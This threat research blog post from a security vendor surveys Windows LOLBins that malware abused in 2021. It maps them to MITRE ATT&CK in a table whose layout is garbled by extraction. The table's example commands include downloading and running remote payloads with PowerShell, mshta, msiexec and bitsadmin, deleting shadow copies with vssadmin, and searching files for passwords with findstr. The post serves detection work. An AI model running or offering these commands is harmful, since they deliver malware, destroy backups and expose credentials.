# LOLBins Are No Laughing Matter: How Attackers Operate Quietly

**uptycs.com/blog/lolbins-are-no-laughing-matter**

_Original research by Pritam Salunkhe and Shilpesh Trivedi_

The Uptycs Threat Research team has observed several malicious binaries in our threat intelligence systems using LOLBins in their
attack kill chain. LOLBins (short form for Living Off the Land Binaries), are non-malicious native operating system or known software
binaries used for performing malicious activities and evading cyber defenses.

The Uptycs Threat research team has created over 300 rules covering different techniques used by LOLBins in the MITRE ATT&CK
framework.

In this post, we’ll take a look at the LOLBins used by the attackers and how you can use Uptycs EDR detection capabilities to find if
these have been used in your environment.

Click here to see the LOLBins MITRE map

## LOLBins and Uptycs EDR coverage

Living off the Land binaries exploit the trusted utilities for achieving malicious objectives. They are mostly used by threat actors to
stay under the radar and continue malicious activities undetected. In Windows, most of the malware families are taking leverage of
LOLBins for a wide variety of phases in the attack kill chain.

[Uptycs EDR has a robust coverage for all LOLBAS (Living off the Land Binaries and Scripts) techniques in the wild. Using the data](https://lolbas-project.github.io/)
from our customer telemetry and threat intelligence systems, the Uptycs Threat research team has created over 300 rules covering 8
different tactics used by LOLBins in the MITRE ATT&CK framework. The distribution of these rules with the techniques is shown
below (see Figure 1).


-----

## April - July 2021 LOLBins & MITRE ATT&CK Mapping

Using the data from our in-house threat intelligence systems and customer telemetry, we created a monitoring dashboard of all
observed LOLBins. From April 2021 through July 2021, we have observed 26 binaries mostly used as LOLBins by several malware
groups. The prevalence of the malicious binaries using the LOLBins is shown below (see Figure 2).

These LOLBins were identified to be exclusively used in the Defense Evasion and Execution phase of the MITRE ATT&CK
framework. The distribution of the different ATT&CK tactics used by the attackers leveraging Windows utilities from April 2021
through July 2021 is shown below (see Figure 3).


-----

The table below describes these 26 LOLbins, along with their =MITRE ATT&CK mapping and a command line example.


LOLBin MITRE
ID


MITRE
Tactic


Description Command Line Example


regsvr32.exe T1218 Defense
Evasion

rundll32.exe T1218 Defense
Evasion


Adversaries may
use regsvr32.exe
to execute
malicious DLLs.

Adversaries may
use rundll32.exe to
load malicious
DLLs.


regsvr32 ..\Kro.fis2

rundll32 ..\Kiod.hod2,DllRegisterServer

EQNEDT32.EXE -Embedding

cmd.exe /c reg add HKCU\<Reg Key Path> /d 1q1a1z.bat /f

PowerShell -c (New-Object
System.Net.WebClient).DownloadFile('http://w2a0zj.pw/wnxtp2.exe',
‘.\morose.exe'); Start(‘.\morose.exe’)


EQNEDT32.exe T1203 Execution Adversaries may
exploit CVE-201711882 vulnerability
in eqnedt32 for
remote code
execution in target
system.

Cmd.exe T0159 Execution Adversaries may
use cmd.exe along
with /c or /k
parameter to
launch other
Windows utilities
for further attack.

powershell.exe T1059 Execution Adversaries may
use powershell.exe
to download
payloads or
execute malicious
PowerShell-based
tools or scripts.


-----

attrib.exe T1564 Defense
Evasion


Adversaries may
use attrib.exe to
hide files for
defense evasion on
the target system.


wmic T1047 Execution Adversaries may
use wmic for
execution or
performing lateral
movement in the
target network.


schtasks.exe T1053 Privilege
Escalation


Adversaries may
abuse
schtasks.exe utility
to initiate execution
or repeat execution
of malicious code .


netsh T1546 Persistence Adversaries may
use netsh to gain
persistence by
executing helper
DLL.


Chrome.exe T1105 Command
and Control


Adversaries can
spawn chrome.exe
to download
malicious files on
the target system.


vssadmin.exe T1490 Impact Adversaries may
use vssadmin.exe
to delete volume
shadow copies to
prevent system
recovery.


net.exe T1562 Defense
Evasion

mshta.exe T1218 Defense
Evasion


Adversaries can
use net.exe to stop
services on the
target system.

Adversaries may
abuse mshta.exe to
proxy execution of
malicious .hta files
and Javascript or
VBScript.


cscript.exe T1059 Execution Adversaries may
use cscript.exe to
execute VB Scripts.


curl.exe T1105 Command
and Control


Adversaries may
use curl.exe to
download tools and
payloads from
remote systems
into compromised
systems.


"C:\Windows\system32\attrib.exe" +h C:\Users\admin\Pictures\*.* /s

wmic process call create "rundll32.exe
C:\ProgramData\lLjlxNACJC.dll CPGenRandom"

schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

netsh add helper C:/Users/Public/settingsync.dll

cmd /k start chrome https://onedrive.live.com/embed?
cid=880174EF88F116A9

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\net.exe stop "samss" /y

mshta https://median-researchers.000webhostapp.com/cmd.hta

"C:\Windows\System32\cscript.exe" //NOLOGO
".\XMCO_Snap_Windows_v2.50.vbs"

curl.exe -o C:\ctf\file.exe
https://dforest.watch.impress.co.jp/library/7/7zip/11608/7z1900x64.exe


-----

certutil.exe T1140 Defense
Evasion


Adversaries may
use certutil.exe to
encode/decode
payload to thwart
detections/analysis.


wscript.exe T1059 Execution Adversaries may
use wscript.exe to
to execute VBA,
VBS, JS files.


msiexec.exe T1218 Defense
Evasion

csc.exe T1027 Defense
Evasion

reg.exe T1112 Defense
Evasion

findstr.exe T1552 Credential
Access

bitsadmin.exe T1197 Defense
Evasion


Adversaries may
use msiexec.exe to
silently launch local
or remote malicious
MSI files.

Adversaries may
use csc.exe tool to
compile
executables from
downloaded C#
code.

Adversaries may
use reg.exe to
query, add or
modify Windows
registry.

Adversaries may
search for
unsecured
credentials which
are stored in files in
the local system
using findstr.exe.

Adversaries may
abuse bitsadmin
(Bits job) to
download malicious
code


certutil -decode C:\ProgramData\googlelog.txt
C:\ProgramData\edge.bat

WScript.exe" "C:\Users\user\Desktop\2.vbs"

msiExec /i http://hotelcontinental-khenifra.com/ffp/sa6t.msi /qn

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cimpactsc.exe"
/noconfig /fullpaths @"2vdvx0yh.cmdline"

REG ADD
\"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V
\"Gom Player\" /t REG_SZ /F /D
\"C:\\Users\\zinx\\AppData\\Local\\Gom Player.exe

findstr /spin "password" *.*

bitsadmin.exe /transfer McbDBJxc
https://jrsawesomebuilds.com/some/GHRPLA83D19D037U/doc.txt
C:\ProgramData\doc.txt

taskkill /im explorer.exe /f

cmd.exe /c whoami.exe /PRIV > file.txt

tasklist /nh /fi "imagename eq svhost.exe


taskkill.exe T1489 Impact Adversaries may
use taskkill.exe to
kill processes or
stop services.

whoami.exe T1033 Discovery Adversaries may
try to find current
logged in user or
verify privileges of
the user using
whoami.exe.

tasklist.exe T1057 Discovery Adversaries may
use tasklist.exe to
enumerate running
processes in the
compromised
system.


-----

verclsid.exe T1218 Execution Adversaries may
abuse verclsid.exe
to execute
malicious COM
payloads.

## LOLBins Observations


verclsid.exe /S /C {E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} /I
{000214E6-0000-0000-C000-000000000046} /X 0x401


Based on the data we obtained from April 2021 through July 2021, we identified the following:

Most of the LOLBin alerts we have identified have been triggered via decoy macro documents.
**regsvr32.exe and rundll32.exe have the highest number of counts as these utilities. These utilities were used exclusively by**
[Qbot and IcedID malwares from the beginning of January 2021, as detailed in our previous blog.](https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros)
We have also seen a significant number of Loki and Agent Tesla malware samples exploiting a Microsoft Equation Editor (EE)
vulnerability in the EQNEDT32.

We will now cover interesting examples of LOLBins and their corresponding MITRE ATT&CK tactics.

## LOLBin - Chrome.exe

 Tactic: Command and Control

_Hash: eae1b54ba4168e16e951fde291520078d8a5f8b98447cedf5663ae62b9069127_

Chrome is the most commonly used browser by most users even though it is not a defaut Windows utility. During June 2021, our
threat intelligence systems detected a document “Resume.docx '' which spawned a new process of chrome.exe via command line.
This activity often goes unnoticed by monitoring solutions.

The document used with chrome.exe to create a new window via command line argument ‘--new-window’ to download the payload
from onedrive.com as shown below (see Figure 4).

## LOLBin - Schtasks.exe

 Tactic: Privilege Escalation

_Hash: 6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d_

Schtasks is used to create scheduled tasks which can be executed from time to time recurrently. We identified a document using
schtasks for privilege escalation.

The Excel document we identified launches schtasks via command line to run the existing task named as SilentCleanup.This action
is performed to bypass UAC and execute powershell commands in elevated mode as shown below (see Figure 5).

## LOLBin - Csc.exe


-----

## Tactic: Defense Evasion

_Hash: 2048aae014930d195ac0c139c3260928bd25d840ff924fb46d25c79048a9c813_

Csc.exe is an inbuilt utility located in the Microsoft.NET\Framework\<Version> folder under the Windows directory. The main purpose
of this utility is to compile C# code. As the malicious code isn't compiled, the adversaries may be able to bypass the detection and
analysis as it can also be named as legitimate looking documents.

We identified a word document named “contract.docm”, which launches powershell to download the uncompiled C# code. After
download is complete, csc.exe compiles the same executable code on the fly as shown below (see Figure 6).

## LOLBin - netsh.exe

 Tactic: Persistence

_Hash: 36b891924e7259d7b517a5f16a108e63aca927da3610b1dcb4dee79a4ccd2223_

Netsh is a command-line scripting utility that allows you to display or modify the network configuration. Netsh also has an option to
add helper DLLs to extend functionality of the utility.

We identified an excel document that called wmic to create a new process of netsh to register the malicious DLL as the helper DLL
as shown below (see Figure 8).

The path of the DLL is also entered into Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. This allows adversaries to
maintain persistence and the execution of the DLL would take place whenever netsh is launched.

## Conclusion

The Uptycs Threat Research team continues to see an increase in the LOLBins used in various stages of the MITRE ATT&CK
framework. As most of these utilities are often used for daily activities, it becomes a challenge for traditional security solutions that do
not monitor process behavior.

Uptycs’ EDR functionality with suspicious parent/child process relationships, correlation and Threat intelligence provides
comprehensive detection and visibility to identify and detect LOLBins malicious activity generically.

**Credits: Thanks to our Uptycs Threat Research team member Rohit Bhagat for maintaining and making enhancements with the**
threat intelligence portal for identifying the latest LOLBins attacks.

## To see more threat research check out the quarterly bulletin below.


-----

Tag(s): [cloud security,](https://www.uptycs.com/blog/tag/cloud-security) [threat hunting](https://www.uptycs.com/blog/tag/threat-hunting)

## Uptycs Threat Research

Research and updates from the Uptycs Threat Research team.

Connect with the author


-----